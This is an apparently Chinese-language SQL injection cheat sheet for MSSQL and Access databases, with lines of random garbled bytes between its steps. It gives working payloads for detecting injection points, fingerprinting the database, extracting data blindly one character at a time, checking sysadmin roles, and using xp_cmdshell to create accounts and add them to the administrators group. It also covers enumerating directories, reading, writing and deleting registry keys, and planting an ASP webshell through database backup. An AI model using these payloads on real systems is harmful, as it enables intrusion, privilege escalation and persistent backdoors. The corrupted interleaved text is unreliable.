1.判断是否有注入;and 1=1 ;and 1=2 �\iA.{,VX
2.初步判断是否是mssql ;and user>0 �_/�J`v`}G
Os/?iGlD*E
3.注入参数是字符'and [查询条件] and ''=' n�}dLfg�*
$�T6+�6�<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �)SHB1U25{
!�mZ�Wd��'
5.判断数据库系统 t�2,?+�q$x
e8eNef L$�
;and (select count(*) from sysobjects)>0 mssql <
w;�49�0g
P}"T�3u�\N
;and (select count(*) from msysobjects)>0 access h2���y�<vO
��FY�)�US>
X4�JS��I%E
P��VSz%"�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �}��"�&Ye�
�}��J`cRDO
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 � �C�w�l:�
�\[d~O>�k2
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `PT'Lakf;3
:eH\9$F`x;
9.(1)猜字段的ascii值(access) D?G'1+RIT~
��-6x�h���
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 aP�]h03s�S
92ngS�aN�C
(2)猜字段的ascii值(mssql) eVzZfB-=4}
r%9=7�5HA�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Wjli(sT#�-
hlfdm�h?�/
10.测试权限结构(mssql) {TvB3QO�sj
CY\D�.Eow�
Mzw:c#����
��M6j~`KSE
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- !xU[BCbfYV
l����V9���
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- !��8Y�A1 o
>�=�8�6*U~
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �+�(Jh�$b_
�V��Ns�3.�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��;?y~ �h$
#�itZ~�tol
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- }tQ^ch;�Q�
�}/4),W@<�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- d(K}v�\�3!
x2f=o|�]D'
;and 1=(select IS_MEMBER('db_owner'));-- ,'n`]@�0?\
x�X@9wNY�D
FQ0�P�XYh
�@}�s EP&$
11.添加mssql和系统的帐户 ��!R![:T\,
�WtC&Qyuq
;exec master.dbo.sp_addlogin username;-- /I:&P Pf�f
;exec master.dbo.sp_password null,username,password;-- Y��RCOh:W*
�By��acS�N
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- nG-Dt��G^z
Lf`<4 �P��
;exec master.dbo.xp_cmdshell 'net user username password �+p$lVn�At
�SX�&Q5:�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �eCiI=HcW;
�L#S|2L_hC
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 8��~F�?%!X
>uYU_/y$2�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- mN�sd&�Rk'
uDLj*U6�L�
�F\�jawoO9
,20��l�` :
12.(1)遍历目录 �viJ�P�6fh
Yy�;�BJ�_�
;create table dirs(paths varchar(100), id int) S��%e)br}
m
?�*h\NaB
;insert dirs exec master.dbo.xp_dirtree 'c:\' 5?0~7^d�e�
211V'|a_�>
;and (select top 1 paths from dirs)>0 -`NzBuV$2,
=�ui�3I_*)
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 9ji`.&�#��
u'^kpr�`�y
MY^o��0N�
X�|aD�>CT�
(2)遍历目录 S|���fb'�
y8Rq2jI;(e
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �=&<d4'(Qk
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �dk�eMiL�m
Ko)�f:=Q�o
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 mW~*GD~�r�
��s~ou$�!|
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 o$Y#C{�wC%
ErgWs��Aw-
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 s�LW��VgD�
,��N
nh�$F
�r�7^v@�
L�2wX?N��A
13.mssql中的存储过程 cl�k]�JA (
���n}-
_fx
xp_regenumvalues 注册表根键, 子键 y.-�K�qa~�
c|K:�o�i,z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 D�/=k9[b!
a�}i�P +#;
xp_regread 根键,子键,键值名 li{!Jp5]1b
oA�rX�P\�#
;exec xp_regread j6j4M,UI43
u\"�/Ea�Q{
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `2]TPaWG�h
�9a��X!<�Z
xp_regwrite 根键,子键, 值名, 值类型, 值 #$�]8W�Sl�
+"1-W>��HV
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �(g&@E(@]?
�F%.U�pV,�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 KT��17I�&:
^�+0>,�-)F
xp_regdeletevalue 根键,子键,值名 ]re}EB\Rs
X4+H��8],)
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 R&$�fWV;'
X�oha.6$l5
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 !�R�@j�b�M
drv�rj~�o:
m4y�WhUi(o
KzJJ@D*4M]
14.mssql的backup创建webshell �Q- w_��@~
��#N�%�j�9
use model EB@rI�vUi,
m�#�-��&<=
create table cmd(str image); ddbQFAQ�QQ
.&`ap�Q�D}
insert into cmd(str) values (''); �Q��jD=JC+
))�nTd��=�
backup database model to disk='c:\l.asp'; o�KH+Q�6S:
dpX �Fx"4A
ru~!;xT��
)3<>H�!yG}
15.mssql内置函数 !R�g�j'{��
�oX'@,(6)
;and (select @@version)>0 获得Windows的版本号 ny�xo���a/
i29a1nD4Hm
;and user_name()='dbo' 判断当前系统的连接用户是不是sa fwlicbs��'
�VDx�F%!h(
;and (select user_name())>0 爆当前系统的连接用户 B�R_�fOIDc
��T�QPrOs?
;and (select db_name())>0 得到当前连接的数据库 f���n.�;C�
~N7;.
3� 7
�gVy��`||z
4#:C t�* f
16.简洁的webshell j)#yyK{k2s
7j29wvS�p5
use model 6urU[t1���
6'.)z��,ts
create table cmd(str image); E25�w�^x2�
P,�(_y��8�
insert into cmd(str) values (''); ��rO �YD[+
mIP�DF1=�)
backup database model to disk='g:\wwwtest\l.asp';
